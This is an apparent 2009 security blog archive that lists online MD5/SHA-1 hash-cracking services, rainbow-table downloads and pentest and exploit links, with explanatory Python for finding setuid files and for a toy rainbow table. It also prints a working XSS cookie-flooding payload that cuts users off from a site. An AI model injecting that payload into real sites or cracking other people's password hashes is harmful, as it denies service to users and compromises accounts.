http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
User Profile Deletion Utility
http://www.microsoft.com/downloads/details.aspx?familyid=901a9b95-6063-4462-8150-360394e98e1e&displaylang=en
Thursday, May 14, 2009
Finding SUID/SGID root programs
EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -l {} \;
A few notes: the backslash the original had in front of -exec was unnecessary (the shell just strips it); -perm -04000 / -perm -02000 match any file with the setuid / setgid bit whatever its owner, so add -user root before -exec if you only want root-owned binaries; append 2>/dev/null to hide the permission-denied noise from /proc and friends. Plain ls -l (rather than -lg, which on GNU ls omits the owner column) shows you who the file is actually setuid to.
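The same search in Python, as an added example rather than the post's own one-liner: it walks a tree, keeps regular files with the setuid or setgid bit, and can optionally restrict to root-owned ones, which the find command above does not do. The fixture files created in demo() are constructed for the example.

```python
import os
import stat
import sys
import tempfile


def find_setid_files(root, root_owned_only=False):
    """Return sorted (path, mode_string, uid) for regular files under root that
    have setuid or setgid set. Equivalent to
    find ROOT -type f ( -perm -04000 -o -perm -02000 ) plus an optional -user root."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):   # does not follow dir symlinks
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: a symlink's own mode, never its target
            except OSError:
                continue                     # permission denied, file vanished, etc.
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            if root_owned_only and st.st_uid != 0:
                continue
            hits.append((path, stat.filemode(st.st_mode), st.st_uid))
    return sorted(hits)


def demo():
    """Constructed fixture: a setuid file, a setgid file and a plain one in a temp dir.
    Returns the base names the scanner reports (chmod on your own files needs no root)."""
    tmp = tempfile.mkdtemp(prefix="setid-")
    for name, mode in (("suid_bin", 0o4755), ("sgid_bin", 0o2755), ("plain_bin", 0o755)):
        path = os.path.join(tmp, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho hi\n")
        os.chmod(path, mode)
    return [os.path.basename(p) for p, _mode, _uid in find_setid_files(tmp)]


if __name__ == "__main__":
    # Walking / takes a while; pass a narrower root such as /usr to try it out.
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, mode, uid in find_setid_files(root, root_owned_only=True):
        print(mode, uid, path)
```

Unlike the one-liner, this reports the numeric owner alongside each hit and swallows unreadable directories instead of spraying errors; diff its output against a known-good baseline to catch a newly planted setuid binary.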
Wednesday, May 13, 2009
WIGS - Website Information Gathering Scanner
http://sucuri.net/index.php?page=scan
Also, my other favorite is: http://www.serversniff.net/
Tuesday, May 12, 2009
LeetUpload.com
Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/
"Official" Metasploit Documentation
http://en.wikibooks.org/wiki/Metasploit/Contents
Then here:
http://trac.metasploit.com/wiki/TitleIndex
You can also get an idea of how massive Metasploit is here:
http://www.ohloh.net/p/metasploit/analyses/latest
Hex Editor - Frhed
http://frhed.sourceforge.net/
Thanks @marcusjcarey
Sunday, May 10, 2009
XSS based Client-side DoS
http://pastebin.com/f3dfe04f7
/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>
I pasted the code in case it gets lost on Pastebin
Saturday, May 9, 2009
This is why you're fat
http://thisiswhyyourefat.com
Friday, May 8, 2009
Monday, May 4, 2009
Sunday, May 3, 2009
Stock Photo Sites
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/
Wednesday, April 29, 2009
Secret stashes of Rainbow Tables - WPA, NTLM, LM, MD5 etc.
including the password file that was used to generate them: http://www.offensive-security.com/wpa-tables/wpalist.txt.tar.bz2
And for everything else you can get them here: http://rt.0x80.org/
Know of another stash? Comment so we can get a list going.
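Both the online cracker sites listed above and the rainbow tables here rest on the same idea: precompute hashes of a wordlist or keyspace once, then answer each unsalted hash with a lookup instead of a fresh brute force. As an added example (not from this post or from any of the linked tools), here is a toy rainbow table in Python over a constructed keyspace of 4-digit PINs hashed with MD5: only chain start and end points are stored, and a lookup regenerates just the chain that could contain the target. The chain count, chain length and reduction function are arbitrary choices for the demo.

```python
import hashlib

# Constructed toy parameters: 4-digit PINs hashed with MD5, 400 chains of length 50.
KEYSPACE = 10_000
CHAIN_LEN = 50
N_CHAINS = 400


def md5hex(pw):
    return hashlib.md5(pw.encode()).hexdigest()


def reduce_fn(digest, i):
    """Map a digest back into the keyspace. The step index i is mixed in so that
    two chains colliding at different positions do not merge (the 'rainbow' part)."""
    return f"{(int(digest[:12], 16) + i) % KEYSPACE:04d}"


def build_table(n_chains=N_CHAINS, chain_len=CHAIN_LEN):
    """Return {endpoint: startpoint}. Only the two ends of each chain are stored;
    the intermediate values are recomputed on demand at lookup time."""
    table = {}
    for c in range(n_chains):
        start = f"{(c * 7919) % KEYSPACE:04d}"   # deterministic, spread-out start points
        pw = start
        for i in range(chain_len):
            pw = reduce_fn(md5hex(pw), i)
        table.setdefault(pw, start)              # keep the first chain on a merged endpoint
    return table


def lookup(table, target, chain_len=CHAIN_LEN):
    """Recover the preimage of target (hex MD5) if some stored chain covers it, else None."""
    # Assume target sits at position i of a chain; walk from there to the chain's
    # end and check whether that endpoint is stored. Latest position first (cheapest).
    for i in range(chain_len - 1, -1, -1):
        pw = reduce_fn(target, i)
        for j in range(i + 1, chain_len):
            pw = reduce_fn(md5hex(pw), j)
        if pw in table:
            cand = table[pw]                  # regenerate the chain from its start
            for k in range(chain_len):
                if md5hex(cand) == target:
                    return cand
                cand = reduce_fn(md5hex(cand), k)
            # endpoint matched but target was not on that chain (false alarm from a
            # merge); keep trying earlier positions
    return None


def coverage(table, sample_pins):
    """Fraction of the given PINs whose MD5 the table can reverse."""
    found = sum(lookup(table, md5hex(p)) == p for p in sample_pins)
    return found / len(sample_pins)


if __name__ == "__main__":
    t = build_table()
    print("stored chains:", len(t))
    print("0000 ->", lookup(t, md5hex("0000")))
    print("coverage on a 200-PIN sample:", coverage(t, [f"{n:04d}" for n in range(0, KEYSPACE, 50)]))
```

Two things the toy makes visible. With 400 chains of length 50 the table costs 20,000 hashes to build but covers well under 20,000 distinct points because chains merge, so some PINs are simply not found; real tables compensate with far more chains and by discarding duplicate endpoints. And every step of the lookup assumes the stored hash is H(password) with nothing else mixed in, which is why the sites above only work on unsalted MD5, MD4 and SHA-1: a per-user salt means a separate table per salt, which is the whole point of salting.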
Saturday, April 18, 2009
Sunday, April 5, 2009
Friday, April 3, 2009
Saved Password Locations
http://www.nirsoft.net/blog/2008/11/saved-password-locations.html
VELite
http://www.secureol.com/downloadVElite.htm
Wednesday, March 25, 2009
SQL Injection Not Just 1=1 Slides
Cracking passwords with Wikipedia
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc
You can find Sebastien on Twitter: @sraveau
Sunday, March 22, 2009
Saturday, March 21, 2009
How to present while people are twittering
http://pistachioconsulting.com/twitter-presentations/
Wednesday, March 18, 2009
Monday, March 16, 2009
And we have Holograms
http://gl.ict.usc.edu/Research/3DDisplay/
Sunday, March 15, 2009
Penetration Testing Massive Links
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://penetrationtests.com/
Token Kidnapping - Privilege Escalation Win2k3 / Win2k8
Windows 2003: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
Windows 2008: http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html
Check out the other awesomeness he has on his site.
VMWorld Europe 2009 Videos
http://www.boche.net/blog/index.php/2009/03/01/vmworld-europe-2009-videos/
10 Papers Every Programmer Should Read
http://blog.objectmentor.com/articles/2009/02/26/10-papers-every-programmer-should-read-at-least-twice